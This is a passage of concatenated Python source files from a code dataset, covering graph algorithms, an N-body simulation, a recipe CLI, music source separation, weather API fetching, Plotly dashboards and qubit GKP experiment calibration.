os.path.isdir(item):\n\t\t\tgraphs.update(buildEachInstance(item))\n\t\telse: \n\t\t\tgraphs[item] = buildGraphFromFile(item)\n\n\t# return to the initial folder\n\tos.chdir(\"..\")\n\n\treturn graphs\n\n# run all implemented algorithms on some graph\ndef test_graph(path: str, graph: NotDirectedGraph) -> None:\n\tprint('\\nTest Results for Graph in ' + path + ':\\n')\n\n\trand_vertex_id = random.choice(list(graph.vertices.keys()))\n\trand_vertex_name = graph.getVertexLabel(rand_vertex_id)\n\trand_vertex_neighbors = graph.getVertexNeighbors(rand_vertex_id)\n\trand_vertex_rand_neighbor = random.choice(list(rand_vertex_neighbors))\n\tother_rand_vertex_id0 = random.choice(list(graph.vertices.keys()))\n\tother_rand_vertex_id1 = random.choice(list(graph.vertices.keys()))\n\n\tprint('Number of vertices = ' + str(graph.getNumberOfVertices()))\n\tprint('Number of edges = ' + str(graph.getNumberOfEdges()))\n\tprint('Vertex ' + rand_vertex_id + ' degree = ' + str(graph.getVertexDegree(rand_vertex_id)))\n\tprint('Vertex ' + rand_vertex_id + ' name = ' + rand_vertex_name)\n\tprint('Vertex ' + rand_vertex_id + ' neighbors = ' + str(rand_vertex_neighbors))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + rand_vertex_rand_neighbor + ' = ' + str(graph.hasEdge(rand_vertex_id, rand_vertex_rand_neighbor)))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + other_rand_vertex_id0 + ' = ' + str(graph.hasEdge(rand_vertex_id, other_rand_vertex_id0)))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + other_rand_vertex_id1 + ' = ' + str(graph.hasEdge(rand_vertex_id, other_rand_vertex_id1)))\n\tprint('Edge ' + rand_vertex_id + ' <-> ' + rand_vertex_rand_neighbor + ' weight(s) = ' + str(graph.weight(rand_vertex_id, rand_vertex_rand_neighbor)))\n\ndef main():\n\tmaybePath = sys.argv[len(sys.argv)-1]\n\n\tif maybePath == \"testAll\":\n\t\tgraphs = buildEachInstance(\"instances\")\n\n\t\tfor graph in graphs:\n\t\t\tif len(graphs[graph].vertices) == 0:\n\t\t\t\tprint(\"Graph in \" + graph + ' has a problem')\n\t\t\t\treturn\n\n\t\tprint(\"Nothing wrong with the inputs.\\n\")\n\telse:\n\t\t# atividade1()\n\t\tatividade2()\n\ndef atividade1():\n\t# Exercicio 1:\n\tprint('Exercicio 1 (Funções De Grafos):')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\ttest_graph(graph_path, graph)\n\n\t# Exercicio 2:\n\tprint('\\nExercicio 2 (Busca em largura):\\n')\n\tprint(breadthFirstSearch(graph, '1')[0])\n\n\t# Exercicio 3:\n\tprint('\\nExercicio 3 (Ciclo Euleriano):\\n')\n\tgraph_path = \"./instances/ciclo_euleriano/ContemCicloEuleriano.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(getEulerianTour(graph))\n\n\t# Exercicio 4:\n\tprint('\\nExercicio 4 (Dijkstra):\\n')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(dijkstra(graph, '1', True))\n\n\t# Exercicio 5:\n\tprint('\\nExercicio 5 (Floyd-Warshall):\\n')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(floydWarshall(graph))\n\ndef atividade2():\n\t# Exercicio 1:\n\tprint('Exercicio 1 (Componentes Fortemente Conexas)')\n\tgraph_path = \"./instances/dirigidos/dirigido2.net\"\n\tgraph = buildGraphFromFile(graph_path, is_directed=True)\n\tprint(stronglyConnectedComponentes(graph))\n\n\t# Exercicio 2:\n\tprint('Exercicio 2 (Ordenação Topológica)')\n\tgraph_path = \"./instances/dirigidos/manha.net\"\n\tgraph = buildGraphFromFile(graph_path, 
is_directed=True)\n\tprint(topologialSort(graph))\n\n\t# Exercicio 3:\n\tprint('Exercicio 3 (Arvore geradora minima - Prim)')\n\tgraph_path = \"./instances/arvore_geradora_minima/agm_tiny.net\"\n\tgraph = buildGraphFromFile(graph_path, is_directed=True)\n\tprint(minimumSpanningTree(graph))\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472219612","text":"import itertools\n\nimport numpy as np\n\nimport nbody.io\nimport nbody.mass\n# these submodules are referenced below, so they must be imported as well\nimport nbody.dist\nimport nbody.its\nimport nbody.time\nfrom nbody import scale\n\n\nclass NBody:\n    def __init__(self, data, n_bodies, virial_radius, total_mass, time=0.0):\n        self._data = data\n        self._n_bodies = n_bodies\n        self._virial_radius = virial_radius\n        self._total_mass = total_mass\n        self._time = time\n\n    def init_energy(self):\n        # set scaling stuff\n        T = self.kinetic_energy()\n        V = self.potential_energy()\n\n        for b in self._data:\n            b.vel *= np.sqrt(abs(V) / T / 2)\n        for b in self._data:\n            beta = 0.5 * V / -0.25\n            #b.pos *= 0.82*beta # scaling added to equalise energies\n            b.pos *= beta # scaling added to equalise energies\n            b.vel /= np.sqrt(beta)\n\n    @property\n    def data(self):\n        return self._data\n\n    @property\n    def n_bodies(self):\n        return self._n_bodies\n\n    @property\n    def virial_radius(self):\n        return self._virial_radius\n\n    @property\n    def total_mass(self):\n        return self._total_mass\n\n    @property\n    def time(self):\n        return self._time\n\n    def scale_distance(self, distance):\n        return distance * self.virial_radius\n\n    def scale_energy(self, energy):\n        return energy * self.scale_mass(1) * self.scale_velocity(1)**2\n\n    def scale_mass(self, mass):\n        return mass * self.total_mass\n\n    def scale_time(self, time):\n        return time * 14.94 * np.sqrt(self.virial_radius**3 / self.n_bodies\n                                      / self.total_mass)\n\n    def scale_velocity(self, velocity):\n        return velocity * 6.557e-2 * np.sqrt(self.n_bodies * self.total_mass\n                                             / self.virial_radius)\n\n    def crossing_time(self):\n        return nbody.time.crossing()\n\n    def half_mass_relaxation_time(self):\n        n = len(self._data)\n        hmr = self.half_mass_radius()\n        return nbody.time.half_mass_relaxation(n, hmr)\n\n    def core_collapse_time(self):\n        hmr = self.half_mass_radius()\n        return nbody.time.core_collapse(len(self._data), hmr)\n\n    def core_radius(self):\n        if not hasattr(self, \"_cached_core_radius\"):\n            core_radius = 0\n\n            densities = self._get_densities()\n            density_center = self.density_center()\n\n            for i, star in enumerate(self._data):\n                central_distance = star.pos - density_center\n                core_radius += densities[i] * np.linalg.norm(central_distance)\n            core_radius /= np.sum(densities)\n\n            self._cached_core_radius = core_radius\n        return self._cached_core_radius\n\n    def density_center(self):\n        ds = self._get_densities()\n\n        dc = np.zeros(3)\n        for i, b in enumerate(self._data):\n            dc += ds[i] * b.pos\n\n        return dc / np.sum(ds)\n\n    def mass_radius(self, factor):\n        half_mass_radius = 0\n\n        distances = []\n        density_center = self.density_center()\n        for star in self._data:\n            distance = np.linalg.norm(star.pos-density_center)\n            distances.append((star.mass, distance))\n        sorted_distances = sorted(distances, key=lambda x: x[1])\n\n        total_mass = np.sum([star.mass for star in self._data])\n        contained_mass = 0\n        iterator = iter(sorted_distances)\n        while contained_mass < total_mass * factor:\n            mass, distance = next(iterator)\n            contained_mass += mass\n            half_mass_radius = distance\n\n        return half_mass_radius\n\n    def 
half_mass_radius(self):\n        return self.mass_radius(0.5)\n\n    def kinetic_energy(self):\n        e = 0.0\n        for b in self._data:\n            e += 1/2 * b.mass * np.linalg.norm(b.vel)**2\n        return e\n\n    def potential_energy(self, soft=True):\n        # NOTE: the 'soft' flag is accepted but no softening is applied here\n        e = 0.0\n        for b1, b2 in itertools.combinations(self._data, 2):\n            r = np.linalg.norm(b1.pos - b2.pos)\n            e -= b1.mass * b2.mass / r\n        return e\n\n    def total_energy(self):\n        return self.kinetic_energy() + self.potential_energy()\n\n    @classmethod\n    def from_file(cls, filename):\n        data = nbody.io.read(filename)\n        return cls(*data)\n\n    @classmethod\n    def from_plummer(cls, n_bodies, total_mass, virial_radius, mass_fn=nbody.mass.ktg):\n        ms = mass_fn(n_bodies)\n        rs, vs = nbody.dist.plummer(n_bodies)\n\n        data = []\n        for m, r, v in zip(ms, rs, vs):\n            b = nbody.its.Body(m, r, v)\n            data.append(b)\n        nbody.its.init(data)\n\n        return cls(data, n_bodies, virial_radius, total_mass)\n\n    @classmethod\n    def from_uniform(cls, n_bodies, total_mass, virial_radius, mass_fn=nbody.mass.ktg):\n        ms = mass_fn(n_bodies)\n        rs, vs = nbody.dist.uniform(n_bodies)\n\n        data = []\n        for m, r, v in zip(ms, rs, vs):\n            b = nbody.its.Body(m, r, v)\n            data.append(b)\n        nbody.its.init(data)\n\n        return cls(data, n_bodies, virial_radius, total_mass)\n\n    def _get_densities(self):\n        densities = np.empty(len(self._data))\n\n        ds = self._get_distances()\n        sorted_distances = np.sort(ds, axis=1)\n\n        for i, b in enumerate(self._data):\n            density = 3 / (4 * np.pi)\n            density *= 3.5 * b.mass\n            density /= sorted_distances[i, 2]\n\n            densities[i] = density\n        return densities\n\n    def _get_distances(self):\n        distances = np.empty((len(self._data), len(self._data)))\n\n        iterator = itertools.combinations(enumerate(self._data), 2)\n        for (i, star1), (j, star2) in iterator:\n            distance = np.linalg.norm(star1.pos - star2.pos)\n\n            distances[i, j] = distance\n            distances[j, i] = distance\n        return distances\n","sub_path":"nbody/nbody.py","file_name":"nbody.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458124395","text":"from sys import argv\nimport sys\n\nsand_ingd = list(('ham', 'cheese', 'tomatoes'))\ncake_ingd = list(('flour', 'sugar', 'eggs'))\nsalad_ingd = list(('avocado', 'arugula', 'tomatoes', 'spinach'))\ns_dict = dict(ingredients=sand_ingd, meal='lunch', prep_time=10)\nc_dict = dict(ingredients=cake_ingd, meal='dessert', prep_time=60)\nsal_dict = dict(ingredients=salad_ingd, meal='lunch', prep_time=15)\ncookbook = dict(sandwich=s_dict, cake=c_dict, salad=sal_dict)\n\n\ndef print_recipe(recipe_name):\n    recipe_data = cookbook.get(recipe_name)\n    print(f\"\"\"\\nRecipe for {recipe_name}:\nIngredients list: {recipe_data.get('ingredients')}\nTo be eaten for {recipe_data.get('meal')}\nTakes {recipe_data.get('prep_time')} minutes of cooking.\"\"\")\n\n\ndef delete_recipe(recipe_name):\n    del cookbook[recipe_name]\n\n\ndef add_recipe():\n    print('Let\\'s add a new recipe!')\n    print('Enter a name')\n    new_name = str(input())\n    print('Enter the ingredients (separate each one by a space)')\n    raw_ing = str(input())\n    new_ing = raw_ing.split(' ')\n    print('Enter the meal type')\n    new_meal = str(input())\n    print('Enter the number of minutes needed (ex: 15)')\n    new_time = str(input())\n    new_rec = dict(ingredients=new_ing, meal=new_meal, prep_time=new_time)\n    final_rec = {f\"{new_name}\": new_rec}\n    print(final_rec)\n    cookbook[f\"{new_name}\"] = new_rec\n    print(f'{new_name} has successfully been added to your cookbook!')\n\n\ndef print_all_recipes():\n    output = \"\\nHere 
are all the recipes of your cookbook: \"\n    len_book = len(cookbook)\n    i = 0\n    for n in cookbook:\n        if i < len_book-1:\n            cond = True\n        else:\n            cond = False\n        liaison = ('.', ',')[cond]\n        output += str(n) + liaison\n        i += 1\n    print(output)\n\n\nusage = \"\"\"Please select an option by typing one of the following numbers:\n1. Print a recipe\n2. Delete a recipe\n3. Add a recipe\n4. Print all recipes\n5. Quit\n    \"\"\"\nprint(usage)\nwhile True:\n    try:\n        response = int(input())\n        if response == 5:\n            print('Cookbook closed.')\n            sys.exit()\n        if response == 4:\n            print_all_recipes()\n            continue\n        if response == 3:\n            add_recipe()\n            continue\n        if response == 1:\n            print_all_recipes()\n            print('Please choose one by writing its name')\n            resp = input()\n            # check if recipe exists in dict\n            if cookbook.get(resp) is None:\n                print('Sorry, this recipe is not in this cookbook.')\n                print_all_recipes()\n                continue\n            else:\n                print_recipe(resp)\n                continue\n        if response == 2:\n            print_all_recipes()\n            print(\"\"\"\n    Please choose the one you wish to delete by writing its name\"\"\")\n            resp = input()\n            # check if recipe exists in dict\n            if cookbook.get(resp) is None:\n                print('Sorry, this recipe is not in this cookbook.')\n                print_all_recipes()\n                continue\n            else:\n                del cookbook[resp]\n                print(f'{resp} has been deleted.')\n                continue\n        else:\n            print('This option does not exist.')\n            print(usage)\n            continue\n    except SystemExit:\n        sys.exit()\n    except ValueError:\n        print('This option does not exist.')\n        print(usage)\n","sub_path":"ex06/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501629437","text":"import sys\nfrom pprint import pprint\nimport numpy as np\nimport re\nimport csv\nimport time\n\nclass Layers:\n    def __init__(self):\n        self.layertypes = []\n        self.weights = []\n        self.biases = []\n        self.numlayer = 0\n        self.ffn_counter = 0\n\ndef parse_bias(text):\n    if len(text) < 1 or text[0] != '[':\n        raise Exception(\"expected '['\")\n    if text[-1] != ']':\n        raise Exception(\"expected ']'\")\n    v = np.array([*map(lambda x: np.double(x.strip()), text[1:-1].split(','))])\n    #return v.reshape((v.size,1))\n    return v\n\ndef parse_vector(text):\n    if len(text) < 1 or text[0] != '[':\n        raise Exception(\"expected '['\")\n    if text[-1] != ']':\n        raise Exception(\"expected ']'\")\n    v = np.array([*map(lambda x: np.double(x.strip()), text[1:-1].split(','))])\n    return v.reshape((v.size,1))\n    #return v\n\ndef balanced_split(text):\n    i = 0\n    bal = 0\n    start = 0\n    result = []\n    while i < len(text):\n        if text[i] == '[':\n            bal += 1\n        elif text[i] == ']':\n            bal -= 1\n        elif text[i] == ',' and bal == 0:\n            result.append(text[start:i])\n            start = i+1\n        i += 1\n    if start < i:\n        result.append(text[start:i])\n    return result\n\ndef parse_matrix(text):\n    i = 0\n    if len(text) < 1 or text[0] != '[':\n        raise Exception(\"expected '['\")\n    if text[-1] != ']':\n        raise Exception(\"expected ']'\")\n    return np.array([*map(lambda x: parse_vector(x.strip()).flatten(), balanced_split(text[1:-1]))])\n\ndef parse_net(text):\n    lines = [*filter(lambda x: len(x) != 0, text.split('\\n'))]\n    i = 0\n    res = Layers()\n    while i < len(lines):\n        if lines[i] in ['ReLU', 'Affine']:\n            W = parse_matrix(lines[i+1])\n            b = parse_bias(lines[i+2])\n            res.layertypes.append(lines[i])\n            res.weights.append(W)\n            res.biases.append(b)\n            res.numlayer += 1\n            i += 3\n        else:\n            raise Exception('parse error: '+lines[i])\n    return res\n    \ndef parse_spec(text):\n    text = 
text.replace(\"[\", \"\")\n text = text.replace(\"]\", \"\")\n with open('dummy', 'w') as my_file:\n my_file.write(text)\n data = np.genfromtxt('dummy', delimiter=',',dtype=np.double)\n low = np.copy(data[:,0])\n high = np.copy(data[:,1])\n return low,high\n\ndef get_perturbed_image(x, epsilon):\n image = x[1:len(x)]\n num_pixels = len(image)\n LB_N0 = image - epsilon\n UB_N0 = image + epsilon\n \n for i in range(num_pixels):\n if(LB_N0[i] < 0):\n LB_N0[i] = 0\n if(UB_N0[i] > 1):\n UB_N0[i] = 1\n return LB_N0, UB_N0\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585047210","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport ConfigParser\n\nconfigfile = None\nlogfile = None\nis_daemon = False\nbe_verbose = False\n\ndef parse_args() :\n \n global configfile, logfile, is_daemon, be_verbose\n ap = argparse.ArgumentParser(description=\"Collector and correlator of Netflow v5, v9 and IPFIX flows and Syslog messages\")\n ap.add_argument('-c', metavar='configfile', default='/usr/local/etc/collectord.conf', help=\"collectors' config file\")\n ap.add_argument('-l', metavar='logfile', default='/var/log/collectord.log', help='log file for collector own messages')\n ap.add_argument('-d', action='store_true', help='start as daemon')\n ap.add_argument('-v', action='store_true', help='verbose debug messages')\n args = ap.parse_args()\n\n configfile = args.c\n logfile = args.l\n is_daemon = args.d\n be_verbose = args.v\n return args\n\ndef parse_config(filename) :\n if not os.path.isfile(filename):\n print(\"File {0} not found\".format(filename))\n quit()\n\n cf = ConfigParser.SafeConfigParser()\n cf.read(filename)\n res = {}\n res['sections'] = cf.sections()\n for sect in res['sections'] :\n opts = {}\n for opt in ['address', 'port', 'type'] :\n opts[opt] = cf.get(sect, opt)\n res[sect] = opts\n return res\n\ndef print_args_config(config) :\n\n print(\"Running the following config:\")\n print(\" logfile name: {0}\".format(logfile))\n print(\" config file name: {0}\".format(configfile))\n print(\" is daemon: {0}\".format(is_daemon))\n print(\" be verbose: {0}\".format(be_verbose))\n print('Config file is:')\n for s in config['sections']:\n print(\"Section {0}:\".format(s))\n print(\" Collector type: {0}\".format(config[s]['type']))\n print(\" Listening on : {0}:{1}\".format(config[s]['address'], config[s]['port']))\n\nif __name__ == \"__main__\":\n parse_args()\n c = parse_config(configfile)\n if c == None :\n print('Error parsing config file')\n else :\n print_args_config(c)\n \n","sub_path":"collector_config.py","file_name":"collector_config.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513694211","text":"# %load q04_plot_runs_by_balls/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_runs_by_balls():\n runs = ipl_df.groupby(['match_code','batsman'])['runs'].sum()\n balls = ipl_df.groupby(['match_code','batsman'])['delivery'].count()\n plt.scatter(runs,balls)\n plt.show()\nplot_runs_by_balls() \n\n\n","sub_path":"q04_plot_runs_by_balls/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"374170183","text":"import soundfile as sf\nimport torch\nimport numpy as np\nfrom evaluator.music_demixing import MusicDemixingPredictor\nfrom demucs.model import Demucs\nfrom demucs.utils import apply_model\nfrom models import get_models, Mixer\nimport torchaudio\nfrom openunmix import data, predict\nimport onnxruntime as ort\nfrom time import time, sleep\n\ndevice = torch.device('cpu')\n\nclass Predictor(MusicDemixingPredictor):\n\n def prediction_setup(self):\n self.models = get_models(model_name, load=False, device=device)\n self.demucs = Demucs(sources=[\"drums\", \"bass\", \"other\", \"vocals\"], channels=48 if '48' in demucs_name else 64)\n self.demucs.load_state_dict(torch.load(f'model/{demucs_name}.ckpt'))\n self.mixer = Mixer(device)\n self.mixer.eval()\n\n def prediction(self, mixture_file_path, bass_file_path, drums_file_path, other_file_path, vocals_file_path):\n file_paths = [bass_file_path, drums_file_path, other_file_path, vocals_file_path]\n sources = self.demix(mixture_file_path)\n for i in range(len(sources)):\n sf.write(file_paths[i], sources[i].T, samplerate=44100)\n\n def demix(self, mix_path):\n start_time = time()\n mix = sf.read(mix_path)[0].T\n base_out = self.demix_base(mix)\n print(time() - start_time)\n demucs_out = self.demix_demucs(mix)\n print(time() - start_time)\n\n sources = base_out * b + demucs_out * (1 - b)\n return sources\n\n def demix_base(self, mix):\n sources = []\n n_sample = mix.shape[1]\n for model in self.models:\n trim = model.n_fft // 2\n gen_size = model.chunk_size - 2 * trim\n pad = gen_size - n_sample % gen_size\n mix_p = np.concatenate((np.zeros((2, trim)), mix, np.zeros((2, pad)), np.zeros((2, trim))), 1)\n\n mix_waves = []\n i = 0\n while i < n_sample + pad:\n waves = np.array(mix_p[:, i:i + model.chunk_size])\n mix_waves.append(waves)\n i += gen_size\n mix_waves = torch.tensor(mix_waves, dtype=torch.float32)\n\n with torch.no_grad():\n _ort = ort.InferenceSession(f'{onnx_name}/{model.target_name}.onnx')\n tar_waves = model.istft(torch.tensor(\n _ort.run(None, {'input': model.stft(mix_waves).numpy()})[0]\n ))\n tar_signal = tar_waves[:, :, trim:-trim].transpose(0, 1).reshape(2, -1).numpy()[:, :-pad]\n sources.append(tar_signal)\n\n with torch.no_grad():\n mix = torch.tensor(mix, dtype=torch.float32)\n sources = torch.tensor(sources).detach()\n x = torch.cat([sources, mix.unsqueeze(0)], 0)\n sources = self.mixer(x)\n\n return np.array(sources)\n\n def demix_demucs(self, mix):\n mix = torch.tensor(mix, dtype=torch.float32)\n mean, std = mix.mean(), mix.std()\n mix = (mix - mean) / std\n\n with torch.no_grad():\n sources = apply_model(self.demucs, mix, split=True, overlap=0.5)\n\n sources = (sources * std + mean).cpu().numpy()\n sources[[0, 1]] = sources[[1, 0]]\n return sources\n\n\nmodel_name = 'tdf+val'\ndemucs_name = 'demucs'\nonnx_name = 'onnx'\n\nb = np.array([[[0.5]], [[0.5]], [[0.7]], [[0.9]]])\n\nsubmission = Predictor()\nsubmission.run()\nprint(\"Successfully completed music demixing...\")\n","sub_path":"predict_blend.py","file_name":"predict_blend.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644711720","text":"import urllib.request\nimport xmltodict\nimport json\nimport sys\nfrom urllib.request import urlopen\nfrom urllib.parse import urlencode, unquote, quote_plus\nimport urllib\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom datetime import datetime, timedelta\n\n\nurl = 
'http://apis.data.go.kr/1360000/AsosDalyInfoService/getWthrDataList'\nkey = \"6vFwBIO5ZKEEPDpVKwkmfssrPdCMNtDdPSff4szG9k4lVLL9qkYIfTxhw6gEggcK9CA6dCD8GsrCDXe%2FU1zKYQ%3D%3D\"\n\n\ndef weather_api(startdt):\n\n startdt = datetime.strptime(startdt, \"%Y-%m-%d\")\n\n addtime = timedelta(days=6)\n enddt = startdt + addtime\n\n startdt = startdt.strftime('%Y-%m-%d')\n enddt = enddt.strftime('%Y-%m-%d')\n\n startdt = int(startdt.replace('-', ''))\n enddt = int(enddt.replace('-', ''))\n\n startdt = str(startdt)\n enddt = str(enddt)\n\n print('step1 finished -------')\n queryParams_page1 = '?' + urlencode({\n\n \"ServiceKey\": unquote(key),\n \"dataCd\": \"ASOS\",\n \"dateCd\": \"DAY\",\n \"numOfRows\": \"600\",\n \"pageNo\": \"1\",\n \"startDt\": startdt,\n \"endDt\": enddt,\n \"stnIds\": \"159\",\n \"dataType\": \"JSON\"\n\n })\n\n queryURL_page1 = url + queryParams_page1\n response_page1 = requests.get(queryURL_page1)\n info_page1 = json.loads(response_page1.text)\n\n a = []\n for i in range(len(info_page1['response']['body']['items']['item'])):\n\n df = pd.DataFrame(info_page1['response']\n ['body']['items']['item'][i], index=[0])\n\n a.append(df)\n\n print('step2 finished -------')\n\n weather_api_1 = pd.concat(a)\n\n weather_api_1 = weather_api_1[['tm', 'avgTa', 'avgRhm', 'avgPa', 'sumRn']]\n weather_api_1 = weather_api_1.rename({'tm': 'date', 'avgTa': 'mean_temp',\n 'avgRhm': 'mean_humidity', 'avgPa': 'mean_pressure', 'sumRn': 'rain'}, axis=1)\n weather_api_1 = weather_api_1.reset_index(drop=True)\n weather_api_1 = weather_api_1.replace(r'', np.nan, regex=True)\n weather_api_1 = weather_api_1.fillna(0)\n weather_api_1 = weather_api_1.astype({'mean_temp': 'float', 'mean_humidity': 'float',\n 'mean_pressure': 'float', 'rain': 'float'})\n print('step3 finished -------')\n\n return weather_api_1\n\n\ndef utc_to_date(utc):\n date = datetime.utcfromtimestamp(utc).strftime('%Y-%m-%d')\n\n return date\n\n\ndef future7_weather_api():\n\n url = 'https://api.openweathermap.org/data/2.5/onecall'\n key = \"9688b3e45c54541ccc6c099da90380ab\"\n\n queryParams_page1 = '?' 
+ urlencode({\n\n \"lat\": 35.1028,\n \"lon\": 129.0403,\n \"appid\": unquote(key),\n \"exclude\": \"hourly,minutely,current,alerts\",\n \"units\": \"metric\"\n\n })\n\n queryURL_page1 = url + queryParams_page1\n response_page1 = requests.get(queryURL_page1)\n info_page1 = json.loads(response_page1.text)\n\n a = []\n for i in range(len(info_page1['daily'])):\n\n utc_num = info_page1['daily'][i]['dt']\n\n if 'rain' in list(info_page1['daily'][i].keys()):\n\n dict = {\"date\": utc_to_date(utc_num), 'mean_temp': info_page1['daily'][i]['temp']['day'],\n 'mean_humidity': info_page1['daily'][i]['humidity'],\n 'mean_pressure': info_page1['daily'][i]['pressure'],\n 'rain': info_page1['daily'][i]['rain']}\n\n else:\n\n dict = {\"date\": utc_to_date(utc_num), 'mean_temp': info_page1['daily'][i]['temp']['day'],\n 'mean_humidity': info_page1['daily'][i]['humidity'],\n 'mean_pressure': info_page1['daily'][i]['pressure'],\n 'rain': 0}\n\n predict = pd.DataFrame(dict, index=[0])\n\n a.append(predict)\n\n weather_pre = pd.concat(a).reset_index(drop=True)\n\n return weather_pre\n","sub_path":"back_end/weather2.py","file_name":"weather2.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"77194471","text":"from datetime import datetime as dt\nfrom datetime import date, timedelta\nfrom datetime import datetime\nimport plotly.graph_objs as go\nfrom plotly import tools\nimport numpy as np\nimport pandas as pd\n\npd.options.mode.chained_assignment = None\n\ndf = pd.read_csv(\"data/performance_analytics_cost_and_ga_metrics.csv\")\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\n\nnow = datetime.now()\ndatestamp = now.strftime(\"%Y%m%d\")\n\n\n# Data Table Update Function\ndef update_datatable(start_date, end_date):\n return df[(start_date <= df[\"Date\"]) & (df[\"Date\"] <= end_date)].to_dict(\"rows\")\n\n\n# Data Table Download Function\ndef update_download(start_date, end_date):\n return df[(start_date <= df[\"Date\"]) & (df[\"Date\"] <= end_date)]\n\n\n######################## FOR GRAPHS ########################\n\n\ndef update_graph(filtered_df, end_date):\n # Sessions Graphs\n sessions_scatter = go.Scatter(\n x=filtered_df[\"Travel Product\"], y=filtered_df[\"Sessions - This Year\"], text=\"Sessions - This Year\"\n )\n sessions_bar = go.Bar(\n x=filtered_df[\"Travel Product\"], y=filtered_df[\"Sessions - This Year\"], text=\"Sessions - This Year\", opacity=0.6\n )\n\n fig = tools.make_subplots(\n rows=2,\n cols=1,\n shared_xaxes=True,\n subplot_titles=(\"Line Chart\", \"Bar Chart\"), # Be sure to have same number of titles as number of graphs\n )\n\n fig.append_trace(sessions_scatter, 1, 1) # 0\n fig.append_trace(sessions_bar, 2, 1) # 1\n\n # integer index below is the index of the trace\n # yaxis indices below need to start from the number of total graphs + 1 since they are on right-side\n # overlaing and anchor axes correspond to the graph number\n\n fig[\"layout\"][\"xaxis\"].update(title=\"Travel Product\")\n for i in fig[\"layout\"][\"annotations\"]:\n i[\"font\"] = dict(\n size=12,\n # color='#ff0000'\n )\n fig[\"layout\"].update(\n height=500,\n # width=750,\n showlegend=False,\n xaxis=dict(\n # tickmode='linear',\n # ticks='outside',\n # tick0=1,\n dtick=5,\n ticklen=8,\n tickwidth=2,\n tickcolor=\"#000\",\n showgrid=True,\n zeroline=True,\n # showline=True,\n # mirror='ticks',\n # gridcolor='#bdbdbd',\n gridwidth=2,\n ),\n )\n updated_fig = fig\n return 
updated_fig\n","sub_path":"components/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400094090","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 30 11:44:39 2021\n\n@author: qulab\n\"\"\"\nimport numpy as np\nfrom fpga_lib.dsl import *\nfrom fpga_lib.parameters import *\nfrom fpga_lib.experiments import *\nfrom fpga_lib import entities\nfrom fpga_lib.constants import Timing\n\nfrom gkp_exp.CD_gate.conditional_displacement_compiler import SBS_simple_compiler, ConditionalDisplacementCompiler, ECD_control_simple_compiler\n\n\nclass GKP(Calibratable):\n \"\"\"\n Args:\n cal_dir (str): directory with CD gate amplitude calibrations\n \"\"\"\n # Params for ECDC sequences\n qubit_pulse_pad = IntParameter(4)\n s_tau_ns = IntParameter(20)\n b_tau_ns = IntParameter(150)\n cal_dir = StringParameter(r'D:\\DATA\\exp\\2021-06-28_cooldown\\CD_fixed_time_amp_cal')\n plusX_file = StringParameter(r'D:\\DATA\\exp\\2021-06-28_cooldown\\gkp_prep\\plus_X.npz')\n plusY_file = StringParameter('')\n plusZ_file = StringParameter('')\n\n # Params for echoed feedback reset\n echo_delay = IntParameter(868)\n feedback_delay = IntParameter(0)\n final_delay = IntParameter(64)\n \n # Params for Kerr-cancelling drive\n Kerr_drive_time_ns = IntParameter(200)\n Kerr_drive_ramp_ns = IntParameter(200)\n Kerr_drive_detune_MHz = FloatParameter(15)\n \n # Params misc\n loop_delay = IntParameter(4e6)\n t_stabilizer_ns = IntParameter(150)\n init_tau_ns = IntParameter(50)\n t_mixer_calc_ns = IntParameter(600)\n \n \n \n def __init__(self, qubit, readout, name='gkp'):\n super(GKP, self).__init__(name)\n self.qubit, self.readout = qubit, readout\n \n @subroutine\n def reset_feedback_with_echo(self, echo_delay, final_delay, feedback_delay=0, log=False, res_name='default'):\n \"\"\"\n Feedback reset with echo during readout.\n \n Args:\n echo_delay (int): delay in [ns] from the beginning of the readout\n to the qubit echo pulse.\n final_delay (int): delay in [ns] after the feedback to cancel \n deterministic (state-independent) cavity rotation.\n feedback_delay (int): delay in [ns] of the feedback pulse. 
